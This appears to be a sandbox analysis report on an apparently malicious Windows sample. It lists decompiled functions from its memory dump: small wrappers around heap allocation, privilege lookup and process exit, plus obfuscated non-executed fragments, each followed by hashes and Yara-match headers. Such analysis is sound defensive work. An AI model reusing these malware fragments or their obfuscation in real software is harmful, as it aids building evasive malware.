                                                                                                                                                                                                          • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                                                                          0x004184a7
                                                                                                                                                                                                          0x004184bd
                                                                                                                                                                                                          0x004184c1

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                          • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                                                                          0x0041864a
                                                                                                                                                                                                          0x00418660
                                                                                                                                                                                                          0x00418664

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3899507212-0
                                                                                                                                                                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                                          • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00418510(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                                                                                                                                                          0x00418513
                                                                                                                                                                                                          0x0041852a
                                                                                                                                                                                                          0x00418538

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418538
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ExitProcess
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 621844428-0
                                                                                                                                                                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                                                          • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          Function 00415675, Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                          			E00415675(void* __eax, signed int __ebx, void* __ecx, void* __edx, void* __edi) {
				intOrPtr* _t11;

				asm("cdq");
				_t11 = __eax - 0x765e42bb;
				asm("in eax, dx");
				asm("frstor [eax]");
				asm("cmpsb");
				 *_t11 =  *_t11 - __ebx;
				if (__ebx %  *(_t11 + 0x40) > 0) goto 0x15cc545c;
				return __ebx /  *(_t11 + 0x40);
			}




                                                                                                                                                                                                          0x00415682
                                                                                                                                                                                                          0x00415684
                                                                                                                                                                                                          0x00415685
                                                                                                                                                                                                          0x00415686
                                                                                                                                                                                                          0x00415688
                                                                                                                                                                                                          0x00415689
                                                                                                                                                                                                          0x0041568e
                                                                                                                                                                                                          0x0041569e

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: cda95eeb8fc153dcb9335fc20fe0a533b77ece451ebd1fac822223aa5b11d45d
                                                                                                                                                                                                          • Instruction ID: 784aaf75d6847e34398e7fdcc4e9fc29d16bea1a21f216775e5c3aa0b4e7d5c3
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cda95eeb8fc153dcb9335fc20fe0a533b77ece451ebd1fac822223aa5b11d45d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4D0A7329954344A8B204D38158A071BBE1F5A3015F0416E2CC889F809D103CC304289
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004162BB, Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                          			E004162BB(void* __eax, void* __ecx) {

				asm("rcl al, cl");
				return  *0xa893f006;
			}



                                                                                                                                                                                                          0x004162c5
                                                                                                                                                                                                          0x004162d9

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 5e72d1b2110083e7783e0588779ba092c49e61d681e7495d6aad8e7662da18a6
                                                                                                                                                                                                          • Instruction ID: 9b49e9f2612febdfa1d12948025200cfe642975c734e1ab1fe035e9a54a9dba0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e72d1b2110083e7783e0588779ba092c49e61d681e7495d6aad8e7662da18a6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65C08C2BB4A14D4642204D4DB8020F1F7B9E687076B6432DEEE08A7501C812E01A0669
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00406A95, Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E00406A95(void* __ecx, char __edx) {

				 *((char*)(__ecx - 0x6b33cc02)) = __edx;
				return 1;
			}



                                                                                                                                                                                                          0x00406a9f
                                                                                                                                                                                                          0x00406ab4

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: deb9ceddc4b326a66533133460c918b732eeddb6e5fbbd1f2218a3e76ff13d29
                                                                                                                                                                                                          • Instruction ID: 50bc09a2f097cf002c8ac8189eea195ba4731081e88d5350736586a12d43565a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: deb9ceddc4b326a66533133460c918b732eeddb6e5fbbd1f2218a3e76ff13d29
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49C08C33A2A1D949C111082D78422BCFB38D753124E1422CBEC88A7300C083C8068649
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00415843, Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 37%
                                                                                                                                                                                                          			E00415843(void* __eax) {

				asm("ror edi, 1");
				return __eax - 0x31;
			}



                                                                                                                                                                                                          0x00415843
                                                                                                                                                                                                          0x0041584f

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: f554f8bfbe30919fdd7e2a225aef4f57e5c460e6ea1fd07443feec9e89f36446
                                                                                                                                                                                                          • Instruction ID: 7095dbb79f45dd1ec694e3b8dbe0fbbaec5a427556b30f4bf89a83f16fc47c12
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f554f8bfbe30919fdd7e2a225aef4f57e5c460e6ea1fd07443feec9e89f36446
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2FA00237F86B180C6C541CBA7C584F8D735E6C307AC553B77D60CB34404052D017015D
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008D10D0, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                                                                                                                          • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008D0060, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                                                                                                                          • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008D01D4, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                                                                                                                          • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008D010C, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                                                                                                                          • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008D1148, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                                                                                                                          • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CF8CC, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                                                                                                                          • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CF938, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                                                                                                                          • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008D1930, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                                                                                                                                                                          • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFAB8, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                                                                          • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFA20, Relevance: .0, Instructions: 6COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
